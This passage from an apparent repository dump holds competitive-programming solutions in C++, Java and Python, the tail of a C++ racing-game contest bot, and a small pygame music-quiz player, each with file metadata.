: -1;\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"GLOBAL_FAIL\",\r\n turn *= -1;\r\n }\r\n else\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"NOT CORNER GLOBAL_FAIL\",\r\n turn = turn > 0 ? 1 : -1;\r\n turn *= -1;\r\n power *= -1;\r\n }\r\n }\r\n //else\r\n //if (countOfFails > COUNT_OF_FAILS / 5)\r\n //{\r\n //forceRight = 0;\r\n //force = 0;\r\n //countOfFails = COUNT_OF_FAILS;\r\n //}\r\n }\r\n else\r\n {\r\n if (force)\r\n force--;\r\n forceSlow = path.size() <= 4 ? 14 : 100;\r\n if (is4(path))\r\n forceSlow *= 1.5;\r\n countOfFails = 0;\r\n globalFail = 0;\r\n\r\n if (forceRight == 0)\r\n turn = getTurn(36);\r\n double dd = speedModule / MAX_SPEED;\r\n if (is32(path))\r\n dd *= 1.3;\r\n if (is3_2(path))\r\n dd /= 2;\r\n if (is212(path))\r\n dd /= 2;\r\n if (is41(path))\r\n dd *= 1.2;\r\n bool fas = is131(path) && speedModule > 16.5;\r\n //cout << si << \" \" << sj << \" \" << badX << \" \" << badY << \"\\n\";\r\n if ((!snake && distToNext < tileSize * dd && distToNext > tileSize && bad.find(S) == bad.end()) || speedModule > forceSlow || (bad.find(S) != bad.end() && speedModule > 11) || fas)\r\n move.setBrake(true);\r\n }\r\n }\r\n cout << \"END OF MOVE\\n\";\r\n cout.flush();\r\n //else\r\n //if (changed && fabs(prevDistance - distToNext) < eps)\r\n //{\r\n //countOfFails++;\r\n //if (countOfFails > COUNT_OF_FAILS / 3)\r\n //forceRight = FORCE_RIGHT;\r\n //}\r\n //else\r\n //countOfFails = 0;\r\n if (forceRight == 0 && forceBack == 0 && planB)\r\n {\r\n if (angleToWaypoint > 0)\r\n angleToWaypoint = PI - angleToWaypoint;\r\n else\r\n angleToWaypoint = -PI + angleToWaypoint;\r\n turn = getTurn(32);\r\n cout << \"PLANB\\n\";\r\n }\r\n move.setWheelTurn(turn);\r\n move.setEnginePower(power);\r\n for (auto car : world.getCars())\r\n if (!car.isTeammate())\r\n {\r\n if (world.getTick() > 250 && self.getDistanceTo(car) <= tileSize * 2)\r\n {\r\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\r\n move.setThrowProjectile(true);\r\n }\r\n if (self.getDistanceTo(car) <= tileSize * 6 && isCorner(a[si][sj]) && planB == 0)\r\n move.setSpillOil(true);\r\n }\r\n //if (world.getTick() > 210 && distToNext > prevDistance)\r\n //{\r\n //forceSlow = FORCE_SLOW_DOWN;\r\n //if (distToNext > tileSize * 5)\r\n //forceSlow /= 2;\r\n //}\r\n bool okSnake = false;\r\n if (snake && path.size() >= 2)\r\n {\r\n int count = 0;\r\n vector<int> fff = {\r\n directions[make_pair(path[0].first - path[1].first, path[0].second - path[1].second)],\r\n directions[make_pair(path[1].first - path[2].first, path[1].second - path[2].second)]\r\n };\r\n for (int i = 2; i < path.size(); ++i)\r\n if (directions[make_pair(path[i].first - path[i + 1].first, path[i].second - path[i + 1].second)] == fff[i % 2])\r\n count++;\r\n else\r\n break;\r\n cout << count << \"\\n\";\r\n okSnake = count >= 9;\r\n }\r\n if (forceRight == 0 && forceBack == 0 && world.getTick() > 195 && (distToNext > tileSize * 5 || (okSnake && bad.find(S) == bad.end() && speedModule > 20)) && planB == 0)\r\n move.setUseNitro(true);\r\n#ifdef vis\r\n cout << \"VISUALIZATION\\n\";\r\n cout.flush();\r\n for (int i = 0; i < a.size(); ++i)\r\n for (int j = 0; j < a[0].size(); ++j)\r\n if (a[i][j] == UNKNOWN)\r\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0xCC0000);\r\n else if (visited[i][j])\r\n visual.fillRect(get(i), get(j), get(i + 1), get(j + 1), 0x008800);\r\n for (auto p : wp)\r\n visual.fillRect(get(p[0]), get(p[1]), get(p[0] + 1), get(p[1] + 1), 0x0000CC);\r\n\r\n visual.fillRect(get(ti), get(tj), get(ti + 1), get(tj + 1), 0x008888);\r\n visual.endPre();\r\n visual.beginPost();\r\n visual.circle(getCenter(ti), getCenter(tj), 600, 0x54618f);\r\n visual.line(self.getX(), self.getY(), nextWaypointX, nextWaypointY);\r\n char sss[45];\r\n sprintf(sss, \"%d %d s:%.2f a:%.2f t:%.2f\", pd, d, speedModule, angleToWaypoint, turn);\r\n visual.text(self.getX() + 120, self.getY() + 120, sss);\r\n sss[44] = 0;\r\n //char qqq[35];\r\n //int ttt = 0;\r\n //for (auto ee : bad)\r\n //ttt += sprintf(qqq + ttt, \"%d %d, \", ee.first, ee.second);\r\n //for (int i = 0; i < 35; ++i)\r\n //qqq[i] = ' ';\r\n //qqq[34] = 0;\r\n //visual.text(self.getX() + 120, self.getY() + 200, qqq);\r\n for (int i = 1; i < min(10, int(path.size())); ++i)\r\n visual.line(getCenter(path[i - 1].first), getCenter(path[i - 1].second), getCenter(path[i].first), getCenter(path[i].second), 0xff0000);\r\n visual.line(getCenter(pi), getCenter(pj), getCenter(ti), getCenter(tj), 0x00ff00);\r\n visual.line(getCenter(ti), getCenter(tj), getCenter(fi), getCenter(fj), 0x00ff00);\r\n visual.fillCircle(getCenter(ti), getCenter(tj), 10);\r\n visual.endPost();\r\n#endif\r\n cout << \"END OF MOVE\\n\";\r\n cout.flush();\r\n }\r\n}\r\n\r\nMyStrategy::MyStrategy() \r\n{\r\n directions[make_pair(1, 0)] = RIGHT;\r\n directions[make_pair(-1, 0)] = LEFT;\r\n directions[make_pair(0, 1)] = DOWN;\r\n directions[make_pair(0, -1)] = UP;\r\n#define rht RIGHT_HEADED_T\r\n#define lht LEFT_HEADED_T\r\n#define tht TOP_HEADED_T \r\n#define bht BOTTOM_HEADED_T\r\n#define cr CROSSROADS\r\n dir[VERTICAL][UP] = dir[VERTICAL][DOWN] = true;\r\n dir[HORIZONTAL][LEFT] = dir[HORIZONTAL][RIGHT] = true;\r\n\r\n dir[LEFT_TOP_CORNER][RIGHT] = dir[LEFT_TOP_CORNER][DOWN] = true;\r\n dir[RIGHT_TOP_CORNER][LEFT] = dir[RIGHT_TOP_CORNER][DOWN] = true;\r\n dir[LEFT_BOTTOM_CORNER][RIGHT] = dir[LEFT_BOTTOM_CORNER][UP] = true;\r\n dir[RIGHT_BOTTOM_CORNER][LEFT] = dir[RIGHT_BOTTOM_CORNER][UP] = true;\r\n\r\n dir[rht][UP] = dir[rht][DOWN] = dir[rht][RIGHT] = true;\r\n dir[lht][DOWN] = dir[lht][UP] = dir[lht][LEFT] = true;\r\n dir[bht][DOWN] = dir[bht][LEFT] = dir[bht][RIGHT] = true;\r\n dir[tht][UP] = dir[tht][LEFT] = dir[tht][RIGHT] = true;\r\n\r\n dir[cr][DOWN] = dir[cr][UP] = dir[cr][LEFT] = dir[cr][RIGHT] = true;\r\n freopen(\"lol\", \"w\", stdout);\r\n#ifdef debug\r\n writeln(FUUUUU);\r\n#endif\r\n}\r\n\r\n//interpolate({0.5, 0.4}, {0.65, 0.365}, {0.85, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -1/8}, {2, -1/4}, {2.5, -1/3}, {3, -0.365}, {3.5, -0.365}, {3.25, -0.365})\r\n" }, { "alpha_fraction": 0.4787123501300812, "alphanum_fraction": 0.4941156208515167, "avg_line_length": 33.447853088378906, "blob_id": "c3f02c14287b19f0cab93da8493d1989d8e1c7c5", "content_id": "46293f739a7336db06167cde6c48b525d4382c11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5778, "license_type": "no_license", "max_line_length": 165, "num_lines": 163, "path": "/CodeForce/0677/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\r\n#include <bits/stdc++.h>\r\n\r\nusing namespace std;\r\n\r\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\r\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\r\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\r\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\r\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\r\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\r\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\r\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\r\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\r\n\r\n#define ll long long\r\n#define pb push_back\r\n#define vi vector<int>\r\n#define pii pair<int, int>\r\n#define vll vector<long long>\r\n#define pll pair<long long, long long>\r\n#define whole(a) a.begin(), a.end()\r\n#define next next__\r\n#define prev prev__\r\n#define count count__\r\n#define argmax(a) (max_element(whole(a)) - (a).begin())\r\n#define argmin(a) (min_element(whole(a)) - (a).begin())\r\n\r\n#define ints(a...) int a; readln(a)\r\n#define lls(a...) ll a; readln(a)\r\n#define wr(args...) err(split(#args,',').begin(),args)\r\n \r\n#define FILENAME \"input\"\r\n#define INF 1000000007\r\n \r\n#define tthti template<typename Head, typename... Tail> inline\r\n#define ttt12i template<typename T1, typename T2> inline\r\n#define ttti template<typename T> inline\r\n\r\ninline void writeln2(){cout<<\"\\n\";}\r\ninline void writeln() {cout<<\"\\n\";}\r\ninline void readln() {}\r\nttti void read(T&);\r\nttti void priws(T);\r\nttti void print(T);\r\n\r\nvoid err(vector<string>::iterator it){++it;}\r\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\r\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\r\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\r\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\r\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\r\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\r\n\r\n///-------------------------------------------------------------------------------------------------------------------------------------\r\n//Igorjan\r\n\r\nint d[303][303];\r\n\r\nvoid run()\r\n{\r\n ints(n, m, p);\r\n\tvector<vector<pii>> a(p);\r\n int x;\r\n fori(n)\r\n forj(m)\r\n scanf(\"%d\", &x),\r\n d[i][j] = INF,\r\n a[--x].pb({i, j});\r\n vector<pii> start = {{0, 0}};\r\n vector<int> dx = {-1, 1, 0, 0};\r\n vector<int> dy = {0, 0, -1, 1};\r\n fori(p)\r\n {\r\n vector<pii> prev = i == 0 ? start : a[i - 1];\r\n if (int(prev.size()) * int(a[i].size()) > n * m)\r\n {\r\n vector<vector<int>> used(n, vector<int>(m, INF));\r\n vector<pair<int, pii>> list;\r\n for (auto pp : prev)\r\n list.pb({d[pp.first][pp.second], pp});\r\n sort(whole(list));\r\n int pointer = 1;\r\n queue<pair<int, pii>> q;\r\n q.push(list[0]);\r\n used[list[0].second.first][list[0].second.second] = list[0].first;\r\n while (q.size())\r\n {\r\n int u = q.front().second.first;\r\n int v = q.front().second.second;\r\n int val = q.front().first;\r\n q.pop();\r\n while (pointer < int(list.size()) && list[pointer].first <= val)\r\n used[list[pointer].second.first][list[pointer].second.second] = list[pointer].first,\r\n q.push(list[pointer++]);\r\n forj(4)\r\n {\r\n int tox = u + dx[j];\r\n int toy = v + dy[j];\r\n if (tox >= 0 && toy >= 0 && tox < n && toy < m && used[tox][toy] == INF)\r\n used[tox][toy] = min(used[tox][toy], used[u][v] + 1),\r\n q.push({val + 1, {tox, toy}});\r\n }\r\n }\r\n for (auto pp : a[i])\r\n d[pp.first][pp.second] = used[pp.first][pp.second];\r\n }\r\n else \r\n for (auto& from : prev)\r\n for (auto& to : a[i])\r\n d[to.first][to.second] = min(d[to.first][to.second],\r\n (i == 0 ? 0 : d[from.first][from.second]) + abs(to.first - from.first) + abs(to.second - from.second));\r\n }\r\n writeln(d[a[p - 1][0].first][a[p - 1][0].second]);\r\n}\r\n\r\nint main()\r\n{\r\n#ifndef ONLINE_JUDGE\r\n double time = clock();\r\n#endif\r\n //ios_base::sync_with_stdio(false);\r\n// freopen(FILENAME\".in\", \"r\", stdin);\r\n// freopen(FILENAME\".out\", \"w\", stdout);\r\n run();\r\n#ifndef ONLINE_JUDGE\r\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\r\n#endif\r\n return 0;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#define a _a\r\n#define n _n\r\nttti ostream&operator<<(ostream&os,vector<T>&a);\r\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\r\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\r\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\r\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\r\nttti void print(T a){cout<<\" \"<<a;}\r\nttti void priws(T a){cout<<a;}\r\nttti void read(T& a){cin>>a;}\r\n" }, { "alpha_fraction": 0.42222222685813904, "alphanum_fraction": 0.4444444477558136, "avg_line_length": 8, "blob_id": "2ebffe59a59ff38baa731f74e57bef90268d730a", "content_id": "144ba97e26dfcbe35ce2d29a84be391aef06049e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 11, "num_lines": 5, "path": "/trains/train2015western/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "s = input()\nn = len(s)\na = [0] * n\n\nprint(a)\n" }, { "alpha_fraction": 0.47021329402923584, "alphanum_fraction": 0.4827163517475128, "avg_line_length": 29.90151596069336, "blob_id": "526531d786e8798cf54c49550d8db36bda0225f0", "content_id": "c4415fe92d9a6e36017d0710f465b7e56c53311f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4079, "license_type": "no_license", "max_line_length": 108, "num_lines": 132, "path": "/ovo/main.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import os\nimport random\nimport pygame\n\nclass Ovochschevoz():\n currentSong = None\n isStarted = None\n\n def nextSong(self):\n if self.currentSong and self.isStarted:\n print(self.currentSong)\n print('-------------------')\n print()\n\n self.currentSong = self.current_list.pop(0)\n pygame.mixer.music.load(os.path.join(self.directory, self.currentSong))\n self.isPlaying = False\n self.isStarted = False\n self.length = 1\n self.startTime = random.randint(0, 60)\n self.timer = 0\n self.setTitle()\n \n def setTitle(self):\n self.title = self.font.render(f'{round(self.timer / 1000, 1)} / {self.length}', True, (255, 255, 0))\n\n def pause(self):\n self.isPlaying = False\n pygame.mixer.music.pause()\n\n def unpause(self):\n self.isPlaying = True\n if self.timer > 0:\n pygame.mixer.music.unpause()\n else:\n self.play()\n\n def play(self, later = None):\n pygame.mixer.music.rewind()\n pygame.mixer.music.play()\n if later is None:\n pygame.mixer.music.set_pos(self.startTime)\n else:\n pygame.mixer.music.set_pos(self.startTime + self.length)\n self.timer = self.length * 1000\n self.length *= 2\n\n self.isPlaying = True\n self.isStarted = True\n\n def stop(self):\n if self.isPlaying:\n self.isPlaying = False\n self.timer = 0\n pygame.mixer.music.stop()\n\n def increase(self, mul = False):\n if mul:\n self.length *= 2\n else:\n self.length += 1\n self.setTitle()\n\n def decrease(self):\n if self.length > 1:\n self.length -= 1\n self.setTitle()\n\n def __init__(self):\n self.title = ''\n self.directory = '/home/igorjan/documents/music'\n play_list = [f for f in os.listdir(self.directory) if f.endswith('.mp3')]\n self.current_list = play_list[:]\n random.shuffle(self.current_list)\n\n pygame.init()\n pygame.mixer.music.set_volume(0.1)\n self.window = pygame.display.set_mode((800, 100))\n self.font = pygame.font.SysFont(None, 40)\n self.clock = pygame.time.Clock()\n\n window_center = self.window.get_rect().center\n\n self.nextSong()\n\n run = True\n while run:\n t = self.clock.tick(100)\n if self.isPlaying:\n self.timer += t\n self.setTitle()\n if self.timer >= self.length * 1000:\n self.stop()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and event.unicode:\n if event.unicode == ' ':\n if self.isPlaying:\n self.pause()\n else:\n self.unpause()\n elif event.unicode == '$' or event.unicode == '4':\n if not self.isPlaying:\n self.play(True)\n elif event.unicode == '*' or event.unicode == '8':\n self.increase(True)\n elif event.unicode == '+' or event.unicode == '=':\n self.increase()\n elif event.unicode == '-':\n self.decrease()\n elif event.unicode == '@' or event.unicode == '2':\n if not self.isPlaying:\n self.nextSong()\n else:\n print(event.unicode)\n self.stop()\n\n if event.type == pygame.QUIT:\n self.nextSong()\n run = False\n \n\n self.window.fill(0)\n if self.title:\n self.window.blit(self.title, self.title.get_rect(center = window_center))\n pygame.display.flip()\n \n pygame.quit()\n exit()\n\nif __name__ == '__main__':\n Ovochschevoz()\n" }, { "alpha_fraction": 0.47229915857315063, "alphanum_fraction": 0.4729916751384735, "avg_line_length": 23.474576950073242, "blob_id": "70f1cb8aa2551a67123d2a894108f7ddb01c1bc0", "content_id": "29a1a40367768d5a93cc7bb3427be8ff16dac081", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1444, "license_type": "no_license", "max_line_length": 83, "num_lines": 59, "path": "/2015/RCC1A/B.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\nimport java.math.*;\n\npublic class Template {\n FastScanner in;\n PrintWriter out;\n\n public void solve() throws IOException {\n BigInteger x = new BigInteger(in.next());\n BigInteger y = new BigInteger(in.next());\n BigInteger z = new BigInteger(in.next());\n System.out.println(x.multiply(y).equals(z) ? \"Infinity\" : \"Finite\"); \n }\n\n public void run() {\n try {\n in = new FastScanner();\n int i = in.nextInt();\n while (i --> 0)\n solve();\n\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n class FastScanner {\n BufferedReader br;\n StringTokenizer st;\n\n FastScanner() {\n try {\n br = new BufferedReader(new InputStreamReader(System.in));\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n String next() {\n while (st == null || !st.hasMoreTokens()) {\n try {\n st = new StringTokenizer(br.readLine());\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n return st.nextToken();\n }\n\n int nextInt() {\n return Integer.parseInt(next());\n }\n }\n\n public static void main(String[] arg) {\n new Template().run();\n }\n}\n" }, { "alpha_fraction": 0.49260303378105164, "alphanum_fraction": 0.503786563873291, "avg_line_length": 29.363636016845703, "blob_id": "aec8e01af99366cecb00028fa598edfce974ba33", "content_id": "665eb43975ac1b5764a3d6798962864fd9aa8fea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11356, "license_type": "no_license", "max_line_length": 174, "num_lines": 374, "path": "/2022/snws2/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//binpow\ntemplate<typename T>\nT binpow(T a, ll n)\n{\n assert(n > 0);\n T res = a; --n;\n while (n > 0)\n {\n if (n & 1)\n res *= a;\n a *= a;\n n >>= 1;\n }\n return res;\n}\n\n//matrix\ntemplate<typename T>\nstruct matrix\n{\n#define vectorOrValarray template<template<typename> typename C, typename = enable_if_t<is_same<vector<T>, C<T>>::value || is_same<valarray<T>, C<T>>::value>>\n friend void swap(matrix& lhs, matrix& rhs)\n {\n swap(lhs.n, rhs.n);\n swap(lhs.m, rhs.m);\n swap(lhs.a, rhs.a);\n }\n\n matrix(int n, int m) : n(n), m(m)\n {\n a.resize(n, valarray(T(), m));\n fori(::min(n, m)) a[i][i] = T(1);\n }\n\n matrix(int n, int m, const T& initial) : n(n), m(m)\n {\n a.resize(n, valarray(initial, m));\n }\n\n matrix(const vector<vector<T>>& rhs)\n {\n n = size(rhs);\n m = n == 0 ? 0 : size(rhs[0]);\n a.resize(n, valarray(T(), m));\n fori(n) forj(m) a[i][j] = rhs[i][j];\n }\n \n matrix(const vector<T>& rhs)\n {\n n = size(rhs);\n m = 1;\n a.resize(n, valarray<T>(0, 1));\n fori(n) a[i] = rhs[i];\n }\n\n matrix(const valarray<T>& rhs)\n {\n n = size(rhs);\n m = 1;\n a.resize(n, valarray<T>(0, 1));\n fori(n) a[i] = rhs[i];\n }\n\n matrix(const matrix<T>& rhs) : n(rhs.n), m(rhs.m), a(rhs.a) {}\n\n matrix& operator=(const matrix& rhs)\n {\n if (&rhs == this)\n return *this;\n matrix temp(rhs);\n swap(*this, temp);\n return *this;\n }\n\n matrix& operator=(const T& rhs)\n {\n matrix temp(n, m, rhs);\n swap(*this, temp);\n return *this;\n }\n\n vectorOrValarray matrix& operator=(const C<T>& rhs)\n {\n matrix temp(size(rhs), 1, 0);\n fori(temp.n) a[i][0] = rhs[i];\n swap(*this, temp);\n return *this;\n }\n\n valarray<T>& operator[](int i) { return a[i]; }\n const valarray<T>& operator[](int i) const { return a[i]; }\n\n matrix& operator+=(const matrix& rhs) { a += rhs.a; return *this; }\n matrix& operator-=(const matrix& rhs) { a -= rhs.a; return *this; }\n matrix& operator+=(const T& rhs) { fori(n) a[i] += rhs; return *this; }\n matrix& operator-=(const T& rhs) { fori(n) a[i] -= rhs; return *this; }\n matrix& operator*=(const T& rhs) { fori(n) a[i] *= rhs; return *this; }\n matrix& operator/=(const T& rhs) { fori(n) a[i] /= rhs; return *this; }\n matrix& operator%=(const T& rhs) { fori(n) a[i] %= rhs; return *this; }\n matrix& operator*=(const matrix& rhs) {\n assert(m == rhs.n);\n matrix temp(n, rhs.m, 0);\n fori(n) forj(m) forn(k, rhs.m) temp.a[i][k] += a[i][j] * rhs[j][k];\n return *this = temp;\n }\n\n matrix& operator|=(const matrix& rhs) {\n assert(n == rhs.n);\n matrix temp(n, m + rhs.m, 0);\n fori(n) forj(m) temp[i][j] = a[i][j];\n fori(n) forj(rhs.m) temp[i][j + m] = rhs[i][j];\n return *this = temp;\n }\n\n matrix& operator^=(ll i) {\n assert(i >= 0);\n if (i == 0) return *this = matrix(n, m);\n return *this = binpow(*this, std::abs(i));\n }\n vectorOrValarray C<T> operator*(const C<T>& rhs) {\n assert(m == size(rhs));\n C<T> ans(n);\n fori(n) forn(k, m) ans[i] += a[i][k] * rhs[k];\n return ans;\n }\n vectorOrValarray friend C<T> operator*(const C<T>& lhs, const matrix& rhs) {\n assert(size(lhs) == rhs.n);\n C<T> ans(rhs.m);\n forj(rhs.m) forn(k, rhs.n) ans[j] += lhs[k] * rhs[k][j];\n return ans;\n }\n matrix operator-() { return *this *= -1; }\n\n friend matrix operator+(matrix lhs, const matrix& rhs) { lhs += rhs; return lhs; }\n friend matrix operator-(matrix lhs, const matrix& rhs) { lhs += rhs; return lhs; }\n friend matrix operator*(matrix lhs, const matrix& rhs) { lhs *= rhs; return lhs; }\n friend matrix operator|(matrix lhs, const matrix& rhs) { lhs |= rhs; return lhs; }\n friend matrix operator+(matrix lhs, const T& rhs) { lhs += rhs; return lhs; }\n friend matrix operator-(matrix lhs, const T& rhs) { lhs -= rhs; return lhs; }\n friend matrix operator*(matrix lhs, const T& rhs) { lhs *= rhs; return lhs; }\n friend matrix operator/(matrix lhs, const T& rhs) { lhs /= rhs; return lhs; }\n friend matrix operator%(matrix lhs, const T& rhs) { lhs %= rhs; return lhs; }\n friend matrix operator^(matrix lhs, const ll& rhs) { lhs ^= rhs; return lhs; }\n vectorOrValarray matrix operator|=(const C<T>& rhs) { return *this |= matrix(rhs); }\n T max() { return a.max(); }\n T min() { return a.min(); }\n T sum() { return a.sum(); }\n\n matrix transpose() {\n matrix temp(m, n, 0);\n fori(n) forj(m) temp[i][j] = a[j][i];\n return temp;\n }\n\n T normalize(int index) {\n T g = 1;\n bool found = false;\n for (T& x: a[index])\n if (x != 0)\n {\n if (not found) g = x, found = true;\n else g = gcd(g, x);\n }\n a[index] /= g;\n return g;\n }\n\n void normalize() {\n fori(n) normalize(i);\n }\n\n T determinant() {\n matrix temp(*this);\n T numerator = 1;\n T denumerator = 1;\n fori(n)\n {\n int nonZero = i;\n while (nonZero < n && !temp[nonZero][i]) ++nonZero;\n if (nonZero == n) return 0;\n\n swap(temp[i], temp[nonZero]);\n numerator *= temp[i][i];\n\n FOR(j, i + 1, n)\n if (temp[j][i])\n {\n T g = gcd(temp[i][i], temp[j][i]);\n denumerator *= temp[i][i] / g;\n temp[j] = temp[j] * (temp[i][i] / g) - temp[i] * (temp[j][i] / g);\n }\n }\n writeln(temp); writeln();\n return numerator / denumerator;\n }\n\n optional<pair<T, matrix<T>>> invert() {\n assert(n == m);\n matrix temp(*this);\n temp |= matrix(n, n);\n\n auto det = solve(temp);\n if (!det.has_value()) return {};\n\n matrix ret(n, n, 0);\n auto s = slice(n, n, 1);\n fori(n) ret[i] = temp[i][s];\n return pair(det.value(), ret);\n }\n\n vectorOrValarray optional<pair<T, C<T>>> solution(const C<T>& b) {\n assert(n == m);\n matrix temp(*this);\n temp |= b;\n\n auto det = solve(temp);\n if (!det.has_value()) return {};\n\n C<T> ret(0, n);\n fori(n) ret[i] = temp[i][n];\n return pair(det.value(), ret);\n }\n\n friend ostream& operator<<(ostream& os, matrix rhs) {\n fori(rhs.n)\n {\n os << rhs.a[i];\n if (i != rhs.n - 1) os << \"\\n\";\n }\n return os;\n }\n friend istream& operator>>(istream& is, matrix& rhs) {\n fori(rhs.n) is >> rhs.a[i];\n return is;\n }\n\nprivate:\n valarray<valarray<T>> a;\n int n, m;\n\n static optional<T> solve(matrix& temp) {\n vector<int> permutation(temp.n);\n iota(all(permutation), 0);\n\n auto get = [&](int i, int j) {\n return temp[permutation[i]][j];\n };\n auto findNonZero = [&](int i) {\n int nonZero = i;\n while (nonZero < temp.n && !get(nonZero, i)) ++nonZero;\n return nonZero;\n };\n fori(temp.n)\n {\n int nonZero = findNonZero(i);\n if (nonZero == temp.n) return {};\n swap(permutation[i], permutation[nonZero]);\n FOR(j, i + 1, temp.n)\n if (get(j, i))\n temp[permutation[j]] = temp[permutation[j]] * get(i, i) - temp[permutation[i]] * get(j, i),\n temp.normalize(permutation[j]);\n }\n ROF(i, temp.n - 1, 0)\n ROF(j, i - 1, 0)\n if (get(j, i))\n temp[permutation[j]] = temp[permutation[j]] * get(i, i) - temp[permutation[i]] * get(j, i),\n temp.normalize(permutation[j]);\n fori(temp.n) temp.normalize(i);\n T mx = 0;\n fori(temp.n) mx = std::max(mx, abs(get(i, i)));\n fori(temp.n) temp[permutation[i]] *= mx / get(i, i);\n matrix ret(temp.n, temp.m, 0);\n fori(temp.n) ret[i] = temp[permutation[i]];\n temp = ret;\n return mx;\n }\n};\n\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\n//}}}\n\nvoid run()\n{\n ints(n, k);\n double p;\n readln(p);\n vector<int> f(n + 7, -1);\n fori(k)\n {\n ints(from, to); --from; --to;\n f[from] = to;\n }\n matrix<double> m(n, n, 0.0);\n fori(n)\n forj1(7)\n {\n int l = i + j; if (f[l] != -1) l = f[l]; l = min(n - 1, l);\n m[i][l] += 1.0 / 6.0;\n }\n\n writeln(binSearch(1, 100000001, [&](int x) {\n auto ans = m ^ x;\n return ans[0][n - 1] >= p;\n }));\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n cout << fixed << setprecision(15);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n 